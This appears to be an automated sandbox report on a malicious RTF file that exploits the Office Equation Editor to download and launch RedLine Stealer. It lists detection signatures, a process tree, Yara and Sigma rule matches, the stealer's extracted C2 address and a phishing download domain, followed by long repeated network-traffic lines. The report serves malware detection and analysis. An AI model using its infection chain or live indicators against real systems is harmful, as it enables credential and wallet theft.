
Windows Analysis Report
2MbHBiqXH2.rtf

Overview

General Information

Sample name: 2MbHBiqXH2.rtf (renamed because original name is a hash value)
Original sample name: 2d1b096a33d1b673fd06db9f3e861761.rtf
Analysis ID: 1461862
MD5: 2d1b096a33d1b673fd06db9f3e861761
SHA1: 3c0a1d1bd1b54381df8769ecc173e8635fea366e
SHA256: bf89362748b9e66c11aaa49ddf83b1665fe038d04225b36de4f26cffc11a0f3d
Tags: rtf

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected RedLine Stealer
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential downloader shellcode found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1164 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2728 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • notorious53209.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Roaming\notorious53209.exe" MD5: 901A623DBCCAA22525373CD36195EE14)
        • RegSvcs.exe (PID: 3116 cmdline: "C:\Users\user\AppData\Roaming\notorious53209.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
    • EQNEDT32.EXE (PID: 3300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration (RedLine): {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
Source | Rule | Description | Author | Strings
2MbHBiqXH2.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen |
  • 0x2aa6e:$obj2: \objdata
  • 0x2aa88:$obj3: \objupdate
  • 0x2aa4a:$obj4: \objemb

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown |
  • 0x133ca:$a4: get_ScannedWallets
  • 0x12228:$a5: get_ScanTelegram
  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
  • 0x10e6a:$a7: <Processes>k__BackingField
  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1079e:$a9: <ScanFTP>k__BackingField
00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(10 further entries not shown in this extract)

Source | Rule | Description | Author | Strings
5.2.notorious53209.exe.590000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.2.notorious53209.exe.590000.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.2.notorious53209.exe.590000.0.raw.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown |
  • 0x135ca:$a4: get_ScannedWallets
  • 0x12428:$a5: get_ScanTelegram
  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
  • 0x1106a:$a7: <Processes>k__BackingField
  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1099e:$a9: <ScanFTP>k__BackingField
5.2.notorious53209.exe.590000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1048a:$u7: RunPE
  • 0x13b41:$u8: DownloadAndEx
  • 0x9130:$pat14: , CommandLine:
  • 0x13079:$v2_1: ListOfProcesses
  • 0x1068b:$v2_2: get_ScanVPN
  • 0x1072e:$v2_2: get_ScanFTP
  • 0x1141e:$v2_2: get_ScanDiscord
  • 0x1240c:$v2_2: get_ScanSteam
  • 0x12428:$v2_2: get_ScanTelegram
  • 0x124ce:$v2_2: get_ScanScreen
  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x13509:$v2_2: get_ScanBrowsers
  • 0x135ca:$v2_2: get_ScannedWallets
  • 0x135f0:$v2_2: get_ScanWallets
  • 0x13610:$v2_3: GetArguments
  • 0x11cd9:$v2_4: VerifyUpdate
  • 0x165ee:$v2_4: VerifyUpdate
  • 0x139ca:$v2_5: VerifyScanRequest
  • 0x130c6:$v2_6: GetUpdates
  • 0x165cf:$v2_6: GetUpdates
5.2.notorious53209.exe.590000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(7 further entries not shown in this extract)

Exploits

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2728, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe

System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 172.67.162.95, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2728, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
Source: Process started | Author: Jason Lynch | Data: Command: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\notorious53209.exe, NewProcessName: C:\Users\user\AppData\Roaming\notorious53209.exe, OriginalFileName: C:\Users\user\AppData\Roaming\notorious53209.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2728, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", ProcessId: 3092, ProcessName: notorious53209.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\notorious53209.exe, NewProcessName: C:\Users\user\AppData\Roaming\notorious53209.exe, OriginalFileName: C:\Users\user\AppData\Roaming\notorious53209.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2728, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\notorious53209.exe", ProcessId: 3092, ProcessName: notorious53209.exe
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2728, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1164, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Snort rule has matched

AV Detection

Source: https://universalmovies.top/ | Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/( | Avira URL Cloud: Label: phishing
Source: 6.2.RegSvcs.exe.400000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["185.38.142.10:7474"], "Bot Id": "wordfile"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | ReversingLabs: Detection: 50%
Source: 2MbHBiqXH2.rtf | ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe | Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 172.67.162.95 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\notorious53209.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: Binary string: wntdll.pdb source: notorious53209.exe, 00000005.00000003.358079357.0000000002950000.00000004.00001000.00020000.00000000.sdmp, notorious53209.exe, 00000005.00000003.358487589.0000000002B30000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_008E4696
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_008EC9C7
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EC93C FindFirstFileW,FindClose,5_2_008EC93C
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_008EF200
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_008EF35D
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_008EF65E
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008E3A2B
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008E3D4E
Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_008EBF27

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC14B LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC14B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC0C3 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC0C3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC206 CreateProcessW,ExitProcess,2_2_005AC206
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC1CC URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC1CC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC165 URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_005AC165
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC23F ExitProcess,2_2_005AC23F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC1E5 CreateProcessW,ExitProcess,2_2_005AC1E5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC08E ExitProcess,2_2_005AC08E
Source: global traffic | DNS query: name: universalmovies.top
Source: global traffic | DNS query: name: api.ip.sb (queried twice)
Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443 (133 identical entries in the report)
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.67.162.95:443
                    Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49162
